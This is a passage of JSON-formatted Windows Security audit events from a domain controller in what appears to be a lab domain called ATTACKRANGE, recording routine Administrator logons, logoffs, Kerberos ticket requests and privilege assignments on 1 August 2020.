e0ead\\System.Management.Automation.ni.dll+b7638f1b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b6e967|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b6df37","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220513,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DDA3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6dda3","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220514,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6F62E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6f62e","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220515,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x700D4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x700d4","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220516,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220517,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220518,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220519,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B91F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b91f","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220520,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B91F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7b91f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220521,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B91F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b91f","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220522,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220523,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220524,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220525,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B959\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b959","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220526,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B959\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7b959","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
